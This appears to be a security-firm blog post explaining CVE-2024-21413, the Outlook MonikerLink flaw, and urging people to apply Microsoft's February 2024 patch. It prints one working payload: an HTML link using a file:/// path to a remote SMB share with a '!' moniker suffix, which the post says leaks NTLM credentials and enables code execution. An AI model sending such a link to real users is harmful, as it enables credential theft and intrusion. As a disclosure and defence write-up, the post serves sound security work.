An intriguing vulnerability in Outlook’s handling of particular hyperlinks has been found, and threat actors have been known to use it in the wild. CVE-2024-21413 has been assigned to this issue, and its severity was rated as 9.8 (Critical).
Nonetheless, Microsoft has patched and resolved this issue in its February 2024 Patch Tuesday release. If this vulnerability is successfully exploited, a threat actor may be able to open a file in editing mode rather than “protected mode,” avoiding the Office-protected view.
The Checkpoint report states that Outlook opens a hyperlink that begins with http:// or https:// using Windows’s default browser. In the event that additional protocols exist, such as the “Skype” URL protocol, clicking on the hyperlink will result in a security alert.
Other situations, such as the “file://” protocol, prevented Outlook from displaying a warning dialog box. Rather, the Windows Notification Center displayed an error warning, and the resource that was attempted to be accessed via the link was not accessed either.
There’s a good possibility the local NTLM credential information was exposed if the file was viewed.
By making a small modification to the “file://” protocol link, the resource can be accessed without the security restriction that was previously displayed. The “test.rtf” file on the remote resource could be successfully accessed by using the link below for testing purposes.
<a href=”file:///\\10.10.111.111\test\test.rtf!something”>CLICK ME</a>
According to researchers, the SMB protocol is used to access this resource, and it is during this protocol that the local NTLM credential information is leaked. Additionally, researchers attempted to elevate this attack vector to the point of arbitrary code execution.
The “look up” function for COM (Component Object Model) objects on Windows is used by the Moniker Link string. Outlook accomplishes this task by utilizing the ole32! MkParseDisplayName() API. According to Microsoft’s Moniker API documentation, a moniker that has “!” in it is considered composite.
To access Microsoft Word, researchers employed this composite moniker with FileMoniker (\\10.10.111.111\test\test.rtf) + ItemMoniker (something). Microsoft Word is executed in the background by Windows as a COM server.
Word opens and parses the file “test.rtf” based on the string “\\10.10.111.111\test\test.rtf” when the hyperlink is clicked. But the attacker is in control of this test.rtf, which was altered further to use “WINWORD.EXE” to execute arbitrary code on the remote system.
According to Microsoft’s security vulnerability report for CVE-2024-21413, the following products have fixes available:
CVE-2024-21413 presents an extreme risk to Microsoft Outlook users across different platforms and versions. Due to this zero-day vulnerability, all individuals or any company using Outlook for email communications could be vulnerable. Users must recognize this threat quickly to protect themselves from possible attacks.
CVE-2024-21413 is currently classified as a zero-day vulnerability, meaning that before its vendor had any knowledge of it, adversaries had begun exploiting it in the wild. Attackers could use this vulnerability against unknowing individuals – users should, therefore, remain vigilant and take necessary measures to reduce its severity as quickly as possible.
Microsoft recently issued an important security patch for Outlook that addresses CVE-2024-21413 and reduces risks associated with it as part of their February 2024 Patch Tuesday upgrades. This update protects systems against potential exploitation attempts. Users should install this update immediately to protect themselves against possible attempts by exploiters to exploit systems.
Visit links found within emails that appear unfamiliar or unexpected with caution, while email security programs capable of detecting and blocking harmful information while informing users about zero-day vulnerabilities and best cybersecurity practices should also be utilized.
CVE-2024-21413 is considered a zero-day vulnerability, meaning that it was exploited prior to being disclosed by its vendor. Attackers could exploit it to launch attacks against unsuspecting victims; accordingly, users should remain aware and take immediate steps in order to minimize its potential dangers.
Zero-day vulnerabilities present a grave threat to digital infrastructure, as evidenced by Monikerlink’s zero-day vulnerability. Understanding their implications, nature, and how best to defend against zero-day attacks are of critical importance both individually and for organizations alike. Staying informed, implementing robust security measures and working closely with cybersecurity professionals are necessary if we wish to effectively navigate cyber threat landscape and reduce their risks – let’s be proactive about protecting digital assets against ever-evolving risks!
Redfox Security is a diverse network of expert security consultants with a global mindset and a collaborative culture. If you are looking to improve your organization’s security posture, contact us today to discuss your security testing needs. Our team of security professionals can help you identify vulnerabilities and weaknesses in your systems and provide recommendations to remediate them.
“Join us on our journey of growth and development by signing up for our comprehensive courses.“
Redfox Cyber Security Inc.
8 The Green, Ste. A, Dover,
Delaware 19901,
United States.
info@redfoxsec.com
©️2024 Redfox Cyber Security Inc. All rights reserved.
